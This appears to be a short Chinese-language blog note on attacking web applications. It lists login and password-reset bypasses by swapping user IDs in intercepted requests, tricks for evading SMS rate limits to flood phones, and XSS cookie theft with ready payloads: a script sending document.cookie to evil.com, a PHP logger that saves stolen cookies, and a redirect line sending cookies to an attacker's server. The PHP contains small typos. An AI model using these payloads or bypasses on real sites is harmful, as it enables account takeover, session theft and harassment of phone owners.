参考文章

https://www.anugrahsr.me/posts/10-Password-reset-flaws/

 

验证码不校验 验证码未绑定用户 本地验证绕过 未校验用户字段 cookie值替换

 

 

场景 - 登录

服务端
1
. (1)拿到想要登录账号id (2)注册账号登录-》退出登录-》登录拦截->修改id值为想要登录账号id-》成功登录想要登录账号

客户端
2.
(1)拿到想要登录账号id
(2)注册账号登录-》拦截修改返回包id-》账号界面状态改变(但无实际权限)

 

 

短信轰炸

X-Forwarded-For
首加86 空格
尾加 . , + - ; \n %0a %00

 Cookie劫持

password reset
http://www.a.com/test.php?abc="><script src =http://evil.com/evil.js></script>
 
evil.js content:
 var img = document.createElement("img");
 img.src = "http://www.evil.com/log?"+escape(document.cookie);
 document.body.appendChild(img);
  
PS:log不一定要存在,因为在日志中会记录下这个过程
上面演示的就是最基本的xss 劫持Cookie的过程, 当你拿到用户cookie后,怎么用它登录服务器呢?在这个过程,方法很多,这里有两种方法:

Burpsuit proxy 修改cookie
Firefox 插件 Data Tamper 截断请求修改cookie

<?php
  $cookie = $_GET['c'];
  $ip = getenv('REMOTE_ADDR');
  $time = data("j F, Y, g:i a");
  $referer = getenv('HTTP_REFERER');
  $fp = fopen('cookie.txt','a');
  fwrite($fp.'Cookie: '.$cookie.'<br/> IP: '.$ip.'<br> Data and Time: '.$time.'<br>Referer: '.$referer.'<br><br>');
  fclose($fp);
?>
将上述保存到自己服务器上,1.php
然后在XSS处写入:
<script>document.location="http://your server/1.php?c="+document.cookie;</script>
View Code

相关文章:

  • 2022-12-23
  • 2021-12-09
  • 2022-03-05
  • 2021-09-28
  • 2021-08-14
  • 2022-01-12
  • 2022-12-23
  • 2021-12-15
猜你喜欢
  • 2021-10-24
  • 2022-12-23
  • 2021-11-29
  • 2021-07-05
  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
相关资源
相似解决方案